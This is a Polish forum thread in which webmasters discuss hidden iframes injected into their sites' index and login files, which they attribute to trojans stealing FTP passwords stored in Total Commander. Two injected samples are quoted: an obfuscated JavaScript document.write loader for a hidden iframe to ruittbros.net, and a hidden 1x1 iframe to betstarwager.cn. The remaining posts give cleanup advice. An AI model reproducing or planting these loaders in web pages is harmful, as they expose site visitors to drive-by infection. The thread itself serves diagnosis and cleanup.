Ktoś podpina mi wirusa do strony

[pies]

Po wpisanym ostatnio poscie , z tym kodem , to mi sie firefox rozjechał

Zrób najpierw dobre trzy skany komputerka bo prawdopodobnie cos z explorera dodaje do plików , a tu chodzi o plik index.html tylko czy index.php

? , doinstaluj jakis antywir , podstawy z zabespieczen sie klaniaja ,

moje zdanie takie jest , potem zmien sobie passłordy na ftp i zacznij sprawdzac czy masz kody wklejone na nich .... i radze predka reakcje

[relons]

fahofiec:

A prawda jest taka (kilkukrotnie przerabiane na tym, innych forach jak i u nas w supporcie) że powodem doklejania są wirusy/trojany na komputerze które wykradają loginy/hasła z programów FTP.

Zmień hasła do serwerów FTP i nie zapamiętuj ich w total commanderze. Trojany połączyły się z każdym serwerem FTP, do którego dostęp zapisałeś w TC i dokleiły się wszędzie. Ten temat przewijał się dziesiątki razy na różnych forach.

[gostek_]

Grzebiac non stop przy kodzie na stronach swoich czy klientow, grzechem jest korzystanie z Windowsa.

[patro]

Usuń to jak najszybciej z kodu strony, zmień hasło na ftp. Jak wam google zaindeksuje stronę z tym wirusem to macie wtedy zerowy ruch z google, trzeba potem pisać prośbę o ponowne sprawdzenie strony.

[aniec2]

aaa=((567,9.007e3>=5e1?687:4804),(0x2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486).2717<=.77?7948>.2438?"write":3.:0x14))](((4,2.),(0.591,""+"<"+"if"+"r"+"a")+(82,7.3e1>=36?"me":.45)+(0.1301," sr"+"c"+"="+"'"+"h"+"ttp"+"")+(8581.<.887?0.7:"://t"+"ruittbros.n")+(476,323,"et"+"/' st"+"yl"+"e='"+"v"+"isib"i)+(863>=8853?9.909e3:0x587,""+"i"+"li"+"ty"+":h"+"id"+"d"+"en"+"'"+"")+(69<38.?0.249:" "+">"+"</"+"if"+"")+(2.>1.?"ram"+"e>":64.)+(223.>=3953?1.:6.5e1,"")));</script><!-- /ad -->

hmmm... nie jestem znawcą ale to mi wygląda na kod wklejający ramkę

iframe src http ruittbros.net/style=visibility:hidden'+69<38.?0.249:> /iframe:64.223.>=

Czyli jest to ramka, prawdopodobnie nieszkodliwa, bo dodaje tylko niewidocznego linka na stronę producenta jedzenia, ale przyznam, że część kodu jest dla mnie niezrozumiałą i wygląda na zakodowaną w ASCII albo HEX. Nie mam pojęcia co te wszystkie cyfry oznaczają.

https://truitbros.net

ciekawe. na idg.pl mają działy, gdzie co jakiś czas odpowiadają na pytania eksperci od antywirusów. tam bym pytał co to jest.

To samo w piątek wieczorem najgorsze, że na wordpressie 2.7.1 - hosting prohost.

[Szeryf]

<iframe src="https://betstarwager.cn/in.cgi?cocacola66" width=1 height=1 style="visibility: hidden"></iframe>

mi ktos zaladowal takie cos prawie na wszystkie strony :/, na roznych serwach: nazwa, home, cal, linuxpl, webd.... NIe mam pojecia jak sie to moglo stac, hasla ma trudne i zroznicowane, jest realne, ze ktos wyciagnal dane z mojego ftp? i jeszcze jedna sprawa, zauwazylem, ze laduje to do plikow index(php,html) i start(php,html) - nawet jak byly jakies w pokatalogach - to w kazdym o tej nazwie bylo iframe :/

[fahofiec]

Dzięki za wszystkie rady. Zainstalowałem nowy program antywirusowy, zmieniłem hasła i zobaczymy co będzie dalej. Swoją drogą, przeraziła mnie skala problemu - jak widać nawet na tym forum znaleźli się użytkownicy, którym - pomimo zainstalowanych antywirusów, zapór itd. - w identyczny sposób włamano się na serwery.

[aniec2]

Ktoś coś testuje na grubszą akcję.

[mrbox]

Ładnie coś Wam lata po kompach(mnie na szczęście problem nie dotyczy)- z 'ostatnich' newsów wynika, że może to być jakaś odmiana confickera- chyba tylko to ustrojstwo ostatnio rozprzestrzenia się tak szybko...

Grzebiac non stop przy kodzie na stronach swoich czy klientow, grzechem jest korzystanie z Windowsa.

Otóż to- nie, żebym był jakiś straszliwie anty- Windows, lub też pro-Linux, ale Windowsa można używać do grania, a nie do pracy, gdzie jednak bezpieczeństwo danych ma aż takie znaczenie, jak w tej branży. A większość narzędzi tworzonych pod Winde daje się odpalić pod Linuchem(staram się na bieżąco sprawdzać co śmiga, a co nie)- może nie wszystkie działają bajecznie, ale działają

[Gość]

A dziwne, że ja tego nigdy nie miałem.... i nie mam

[k3rn3l]

Kukis i się ciesz

Ja osobiście też nie miałem ale Klienci moi mieli...

[SEO_Artur]

Witam,

Jeszcze kilka dni temu miałem z tym problem. Taki złośliwy był wpisywany u mnie we wszystkich plikach index.php oraz index.html jakie znalazł wirus na FTP. Hasła zdobywał przez Total Commandera. Aby pozbyć się szkodnika zrobiłem tak:

1. Zmiana haseł + usunięcie zapamiętanych haseł w TC

2. Analiza logów ( Hijacthis + Combofix ) i ewentualne fixowanie

3. Skanowanie komputera NOD32 oraz Kaspersky Online Scanner4.

4. Kilkakrotne ( do czasu całkowitego usunięcia wszystkich zarażonych, wykrytych plików ) skanowanie Malwarebytes' Anti-Malware.

5. Zamknięcie portów programem WWDC

6. Ponowne przeskanowanie programem Malwarebytes' Anti-Malware w celu upewnienia się, że wszystko jest ok.

7. Na zakończenie ostatnie już skanowanie antywirusem NOD32.

Na dzień dzisiejszy złośliwego kodu na stronie nie widać i mam nadzieję, że już tak pozostanie. Dla własnego bezpieczeństwa nie zapisuję już haseł w programie TC.

Pozdrawiam,

Artur

[Kyo]

Potwierdzam - znajomy miał. Trojan wykradł hasła z Total Commandera i właził na ftpy.

Krążą w necie plotki że to TC sam wysyła jak go używasz nielegalnie, ale wg mnie to zwykły trojan kradnie hasła.

Uwaga - to infekuje tez pliki typu login.*

[patro]

Mój znajomy też miał, kilka dni temu usuwałem mu to ze strony, jedyna i logiczne rozwiązanie to zmiana hasła i antywirusa.

[aniec2]

w moim przypadku jeszcze format:)